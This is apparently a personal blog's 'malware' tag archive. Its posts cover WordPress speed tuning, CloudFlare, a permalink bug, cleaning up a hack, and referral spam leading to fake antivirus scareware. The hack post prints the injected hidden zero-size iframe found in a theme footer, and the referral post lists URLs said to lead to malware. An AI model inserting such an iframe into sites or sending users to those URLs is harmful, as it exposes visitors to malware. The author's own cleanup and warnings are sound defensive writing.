Tag Archive: malware

Akismet and Jetpack Issues, Stop Spammers and CloudFlare Save the Day

My Web Host Penalised Me Yet Helped Speed Up My Site

Introduction

shared web hosting

shared web hosting

This site used to be hosted on Site5, in Texas.  I had a shared web host account, about the cheapest there is on Site5 though by no means the cheapest around (I’ve had experience of really cheap hosts….).  It worked alright, site management was good.  Then, I got hit by spammers.  Twice.  Big time.

Each time, this slowed the site down, made life hell for other shared accounts, especially when I introduced WordPress plugins to counter this.

Naturally, Site5 advised me to stop the hits or they’d pull my account (they’d already temporarily disabled it).  They advised me to cut the plugins, using GoDaddy’s plugin testing tool, WordPress Plugin Performance Profiler (P3).  So I did this, and after some trial and error, got the running processes down.  Of course, I lost a bit of neat functionality.

Testing Times

Apart from internal WordPress testing, it pays to test your site as if you are someone else somewhere else.  Pingdom have a set of tools that does just this, testing from various global locations and I can recommend it.

Result!

I used an iterative approach, testing various combinations of plugins and systems to end up as being in the top 8% sites for speed in the world!  Not bad for free is all I can say!   You’ll see in the screenshot above, that 92% of websites are slower than mine….   So is it really free?  Here goes…..

Paid For:
  • Web Hosting.  Shared.
  • My domain registration.
Free:
  • WordPress and all the LAMP functionality
  • WordPress plugins
  • CloudFlare
Pingdom Says

Pingdom Says

Automattic Issues

WordPress (which this site uses) is built by the Automattic team and naturally have expanded over time.  I’ve used their plugins for many years, Akismet from the off, which is a comment spam blocking system.  Latterly, they came out with Jetpack, where they say,

Supercharge your WordPress site with powerful features previously only available to WordPress.com users.

Jetpack is a WordPress plugin that supercharges your self-hosted WordPress site with the awesome cloud power of WordPress.com.

P3 Selected Output

P3 Selected Output

This is all well and good, except when I tested it using the P3 plugin profiler, Jetpack was the biggest drag on everything!   The worst part of it, was that actually, I was only using a small part of its features and it was still the biggest suck on performance.

  • I didn’t use Carousel for photos since I had an old solution, NextGen Gallery, that I’m loathe to change.
  • The comments system mucked up all other comment plugins, grabbing all for itself (a bit like Microsoft here!)
  • I used the stats, and that was about all, yet they were very slow and not that informative, actually.
  • Nearly all the other stuff I looked at, tried and ditched for similar reasons.

So much for the awesome cloud power.  On top of this, you’re now supposed to pay for parts of Automattic’s offerings, like Akismet, the comment spam blocker while a major offering of theirs was actually slowing my site right up!

What Did I do?

Change host!

Well not initially, actually, though the heavy-handed Site5 approach got my ire a bit I must admit.  I did do loads of tests with a host of caching, anti-spam and page load improvement plugins first…

Vidahost

Vidahost

I now use Vidahost in the UK.  The site is faster to manage (along with my others) since the servers are in the UK with me, and it’s cheaper, providing almost the same functionality and tools as Site 5.  I took the opportunity to clean out a few dead files in the process, but essentially, all was moved, database and files.  The lot.  Just twiddled config.php and the .htaccess file a bit.

did worry that my American visitors, who are actually in the majority, would  suffer slower speed and thus I’d get hit in Google rankings, but hey, wait for later…!

I got it all working and as part of the whole “thinking” process since the very first warnings from Site 5, I’d been looking for better things.

Looking at Things Closely

  • I like Related Posts.   Related Posts plugins do just that.  I love the idea of pulling out meta-data relevant stuff from a website.  Site 5 had said, as have others on the web, that this sort of plugin makes big hits on a site.  Some of them really do!  I use  YARPP, with a limited subset of features enabled which cuts down processing.
  • I also like Andrew Ozz’s Shutter Reloaded which shows images nicely.   I also like his post editor, TinyMCE Advanced, it being the best of many I’ve tested over the years.
  • I like NextGEN Gallery having used it since before WordPress got all image fancy.  I haven’t got time to fiddle with thousands of photos now…
  • I’d like some statistics within WordPress.
  • I’m not that interested, any-more (though I was) in Social Networking sharing features.  Truth be told, if someone wants to share, they will.
  • I’ve read a lot on image improvements.  I’ve always shrunk images manually before uploading using the excellent IrfanView application.  But during this enforced research, other things like sprites and delayed image loading popped into the equation.

So I like certain plugins or functionality.  I try and use the one that works best for me.  Too many plugins make a big hit on the server and thus website loading.

Caching

A way round this is caching.  e.g. If a post is created and has related posts clagged on the bottom using YARPP, then the post is cached and YARRP is only running once.  How and where the caching is done is the crux of the issue…

Site 5 suggested W3 Total Cache as a better alternative to Wp Super Cache,  which I’ve used for years.    Naturally, I’ve tested this and my conclusion was that it could be fast, and it was fast for a while, but over time on each of my sites I got issues around lock-ups and the huge and complex caching system around files, databases and sprites.  This list is long.

I’ve also tested various database query caching plugins likewise over the years.  W3 Total Cache incorporates this method too, but ultimately, it made too much work for not a lot of difference IMHO, since I’m lazy.

However, it did point me to one thing!  CloudFlare.

CloudFlare

CloudFlare Admin1

CloudFlare Admin1

Ah.  The power of the cloud is back!

Not only that – it works!

CloudFlare Admin2

CloudFlare Admin2

You re-direct your DNS at your domain registrar (joker.com in my case) to CloudFlare’s DNS servers, set up the site malware protection level you want – then after a few hours your whole site is cached and protected.  Best of all, it’s free for a little site like this!

In fact, using CloudFlare speeded everything up even before I got caching going again…

Further Plugin Work

Now, I went back to Wp Super Cache from Doncha and it all works fine.  Site speed good.  I then ditched Jetpack after testing it again.  It really does interfere with all comment plugins, and I really like this comment one as do people who comment here:

  • U Extended Comment

It works great and does everything I want.  So Jetpack, it’s bye bye.  Take all your fancy commenting system, your stats, your social media and fancy image handling.

But What About Comment Spam?

Stop Spammer Results2

Stop Spammer Results2

Stop Spammer Results1

Stop Spammer Results1

I’ve found the best solution is a plugin called Stop Spammer Registrations Plugin.  It needed a bit of fine tuning and a re-activation of Akismet to whip out a few wisps of spammer, but it works and seems to trap and report more spammers than ever Akismet did alone.  Akismet, by itself, does the commenting bit in tandem with the plugin, rather well.

Registration Spam

SABRE Results

SABRE Results

Unfortunately, during testing, a few unwanted visitors managed to register on the website.  They can’t do real harm since I use the lowest role level at registration time.  So I re-enabled SABRE and since then, no more unwanted visitors.  I’ve tested SABRE as a visitor and the settings I’ve chosen are just about right – I’ve had issues with it previously when it blocked registration!  But reducing the feature set and re-uploading a clean plugin fixes that.

CloudFlare and the CDN Issue

I toyed around getting a CDN to host images.  But they (can) cost and anyway, I’ve gone off Amazon and others because of their anti-Wikileaks actions plus they don’t pay UK tax…

Delayed Image Loading

However, in the course of my reading, I found that images can be loaded just as the page comes into view, which speeds up page loading, and as a consequence the perceived nippiness of a site.  The plugin BJ Lazy Load does this for me and works brilliantly.  Check this last post about Australia which has a lot of medium sized images to see them pop into view!

Delayed Javascript Loading

I use two plugins that handle this end of the issue around JavaScript.

Statistics

WP SlimStat1

WP SlimStat1

Well, Jetpack is gone.  I won’t be using it unless some serious improvements are made, it being the prime reason for the server load that brought me to this position in  the first place.  As soon as I disabled it (and simultaneously blocked all comments to the site, which isn’t the best thing, this being a blog after all), all server loads went away.

I now use SlimStat and it works very well.  I’ve tried many over time, including Google’s analysis tools, my webhost’s stats tools, Wassup and more, but for now, this is it.

Conclusion

My site works pretty fast and is pretty protected from the bad guys.  I actually still use more plugins than what is usually recommended – 50 is a huge lot according to web gurus and sages.  Currently there are 31 in active operation with 8 inactivated.  I love trying new ones, it’s like that, that’s just the way it is.

The delayed image loading is particularly apparent on a post with a lot of images, say this recent one.  The post loads fast and you see the first images load, and as you scroll down you’ll see other images appear with a slight delay.

All the other stuff is incremental improvement, with the biggest, by far, being the free CloudFlare service which I cannot recommend highly enough.  It’s a no-brainer, go and do it?

My Full List?

These are the plugins currently running that help my site work.  Many are for security, which demonstrates the state of play versus the bad internet guys full well.

Related Posts:

Crawling Chaos, Worms, from The Big C

Strangely post on October 10th, 2012
Posted in Art Tags: , , , , , , , , , , , , ,

Audio clip: Adobe Flash Player (version 9 or above) is required to play this audio clip. Download the latest version here. You also need to have JavaScript enabled in your browser.

The Big C

The Big C

I’m currently working on this to make it an even bigger wall of noise than we were originally capable of….   A video is in progress which is an almost synchronised wall of light.  It should be considered as Version 1, but I may stick with it after reviewing on another day.

This is version 2 of both sound and video.  The initial sound twiddle was okay-ish, but the nature of the video conversion process using the tools I have meant it went all fizzy and mushy, not really what I’m after with this one.

Enhanced by Zemanta

Related Posts:

Comments are closed

WordPress Permalinks Generated But Not Redirected

Introduction

Appalled

Appalled

I’ve had a few site problems whereby my host Site 5, said I was using too many resources and crashing their systems.  Naturally, I was appalled.  I traced this to a variety of plugins plus some errors in php files which must have arrived either during the periodic updates or during editing.  These were errors whereby extra text (either blank space or a carriage return to be precise) were added to the end of the php file, which usually makes it fail.  This a is a Google search on the main error I received,

Warning: Cannot modify header information – headers already sent …  (  This is then followed by error details; usually error on line xx, repeated several times for a variety of xx)

After battling for some time, I just gave up, exported my database key tables (things like posts, comments, etc but omitting plugin inserted tables and the very large options table which I deemed to be very bloated after over five years of continuous WordPress operation…!) and re-installed WordPress as a fresh installation on my server.

Weird Permalink Problem Following Clean Install of WordPress

This is where the weird problem arose….

SP Permalink Settings

SP Permalink Settings

When one installs WordPress for the first time, permalinks are set to the default – so this current post would be:

 http://strangelyperfect.tv/?p=11622

For SEO reasons and for many years I’ve used the format shown in the screenshot from my site shown left.  This current post will thus appear as:

http://strangelyperfect.tv/11622/wordpress-permalinks-generated-but-not-redirected

It’s a “Custom Structure” and the .htaccess file is updated automatically by WordPress when you set it.  You’ll see it’s set to:

/%post_id%/%postname%/

Now, on firing up a post, say this one,

http://strangelyperfect.tv/11428/victory-or-is-it-victory-jesse-willms-surrenders-all-to-ftc-onslaught/ ,

the actual web address I was taken to was:

http://strangelyperfect.tv/%post_id%/victory-or-is-it-victory-jesse-willms-surrenders-all-to-ftc-onslaught/  (error shown in bold)

…which redirected to the homepage of the site, http://strangelyperfect.tv/   This was not what I was expecting!  So I played with the slashes, went back to original simple permalink structure, tried some of the suggested structures – and they all worked!

A custom structure of /%postname%/ worked as well, but not the one I wanted and have used for years.

Weird.   So naturally, I tried Google.

Permalink Redirection Problem Solved.

There’s a lot on the web about this.  Most is about getting .htaccess right with permissions and the code.  But mine was okay, as were all the other suggestions to try.

A real key to resolving my problem was here, Custom Permalinks Generated But Not Redirected in the WordPress forums.  Specifically, it comes from the user, James, a Happiness Engineer!

He suggested adding index.php between the domain name and permalink structure.  So my custom structure changed to:

index.php/%post_id%/%postname%/

WordPress added a leading slash on the save and the website worked!  WAHAY!

However, the best is yet to come….

I thought that the URL was now not pretty, in fact, it was pretty ugly.  The URLs were now being shown like:

http://strangelyperfect.tv/11428/victory-or-is-it-victory-jesse-willms-surrenders-all-to-ftc-onslaught/

So I removed the index.php and reset the custom structure to what I wanted – /%post_id%/%postname%/

It worked!  WAHAY!  All posts’ URLs redirecting  how I wanted!

Conclusion

I’ve no idea, actually.  I’m suspecting some caching, somewhere down the great inter-tubes in the sky, but apart from that…………..?

  • Was it my server?  Dunno.
  • Was it DNS caching?  Dunno.
  • Was it ISP caching? Dunno

All I know is that it’s working now, and the Happiness Engineer’s suggestion sent me on my way, happy.


Postscript – added 22/11/2015

My permalinks in 2015

My permalinks in 2015

Since this time, I have not had to use the index.php fix, and the permalinks are all working correctly.  The flip-flip of adding and removing the fix….just seemed to work!

NoIdeaDeer


 

Enhanced by Zemanta

Related Posts:

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com  (now Microsoft!) that shows the various net connections being made to one’s PC from everywhere.  This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area), fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230……  This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above..

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, mySQL databaase and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer!  On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.

It was simply stripped out and the website then worked fine…..  but to be sure, I have downloaded then checked the footer file in a fresh theme download to be sure – it’s clean!  I then uploaded a whole clean Suffusion theme in it’s entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.

A recheck on Securi shows my website to be okay now.  See screendump below.   I’ll be using Securi  a lot more!

Securi Site Check

Securi Site Check

Related Posts:

Comments are closed

Website Referral Spam and Cyber Security Malware

Fear Uncertainty DoubtRemove Referrals Information from This Website because of Malware

Like many blogs, this website has displayed the last few hits (referrals) that it’s received as a kind of ‘live’ activity recorder and a small service back to the referring website.  However, I’ve had to pull this from my front page because over the last few days, hundreds of malware-laden websites have seemingly broadcasting pings to everyone else….

Anyone unlucky enough to click on these back-links to the ‘referrer’, is then presented with some fake anti-malware scan that’s almost impossible to get away from without resorting to Task Manager.

Analysis and Appearance

The referring link is usually from a sub-domain of an apparently ‘normal’ website (whatever ‘normal’ means, but I hope you know!).  Here’s an example that points to malware:

http://srpvxdd.franklinrealtyvacationrentals.com/page.php?n=overcome-compulsive-overeating

franklinrealtyvacationrentals.com is a normal-looking estate agent’s site in Florida.

This next one points to a blank page, has a similar php ?page= construct, but lacks a sub-domain:

http://sweetepeach.com/page.php?uuu=cube-memory-dane-elec

sweetepeach.com is a website under construction at ixWebHosting, my old host that I left because it was so slow.

And this one is another malware-laden website:

http://www.pbparts.com/error.php?404

pbparts.com appears to be a computer parts on-line store in Arizona.

And here are two web addresses from the same domain!:

http://rlzkiio.tummy2tummy.com/page.php?n=tiered-tulle-dress

http://ziqklvc.tummy2tummy.com/page.php?d=official-ffa-dress

tummy2tummy.com appears to be mother and baby website.

Examples

CyberSecurityWarning1

Cyber Security Warning1

CyberSecurityWarning2

Cyber Security Warning2

CyberSecurityWarning3

Cyber Security Warning3

Here are examples of the typical warning messages after hitting a duff link or two…  These are taken from Firefox 3 & IE8, all fully patched and up-to-date etc.

  • The website sometimes redirects, sometimes not, to the malware-coded location.
  • The message/dialog boxes have a variety of wording and button suggestions
  • Some websites are completely un-closable by normal means and the Task Manager is the only way to get out of a loop
  • There are a variety of files to download from the various websites.  The one in the video below is called “Inst_174s1.exe” – which I’ve seen 3 times now.  I’ve also seen another called “setup_build8_239.exe” which has a standard windows setup icon inside it to ensure it’s apparent legitimacy!

Standard Anti-Virus Failure

The video shows the fake scan and the various failed attempts at closure I made.  The current IP address of the user (myself) shows to add an air of realism to it, although this is easily shown on any webpage.

Fortunately, in this video, IE8, even though the browser privacy and window size & positioning was mucked around by the malware-site, was finally closable with the normal close button at the top right.  On other sites, the only way to get out of the loop in both IE8 and Firefox, was to use Task Manger to crash the process down.  This worked, fortunately.

I downloaded the files purposely on some occasions for analysis….

ESET’s NOD32 (my AV program) failed to detect both these files as bad!  I uploaded both for analysis to ESET and one has since been found to contain a trojan, a variant of Win32/Kryptik.AWY trojan!  This trojan has been in the signature database since 21/10/2009 when NOD32 was the only AntiVirus program to detect it!  So things aren’t that bad.  Presumably, if I’d have ran the programs NOD32 would’ve kicked in, but I haven’t tried that yet.  The setup file was only first detected as malware yesterday, and then only by a few vendors.  The analysis of it’s actions is particularly revealing as along with a shed-load of new registry keys, it also modifies the ‘hosts’ file!

NOD32 wasn’t alone in this scanning detection failure.  I tried the online scanners of Trend, McAfee and AVG on the two files and they all failed to detect anything!  Time constraints meant I didn’t try Kaspersky, Symantech et al, but I’m fairly certain that the same results would’ve happened.

Conclusion

Everything is not as it seems!  Be very careful what you click on!

Send any suspicious file to VirusTotal.com as it has quite a crack at finding out the truth about files from it’s methodology of using most of the Anti-virus vendors.

As for my website here, the recent referrer back-links are now gone as they made me look like a pointer to bad sites, and I’m not.  Whether it’s possible for this sub-domain behaviour to be blocked, probably depends on the website owners, as it’s not the browser’s fault.

What I have noticed, is:

  • A lot of these malware sites are hosted at my old crap host, ixWebhosting.com  (If I recall, a setting exists to block sub-domain creation)
  • A lot of host sites are in Arizona, Florida and Utah
  • A lot of malware sites can be traced back to China & eastern European states.

Make of that what you will.  If I spot any more ‘tendencies’ or ‘co-incidences’, I’ll add them to the list.

Related Posts:

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me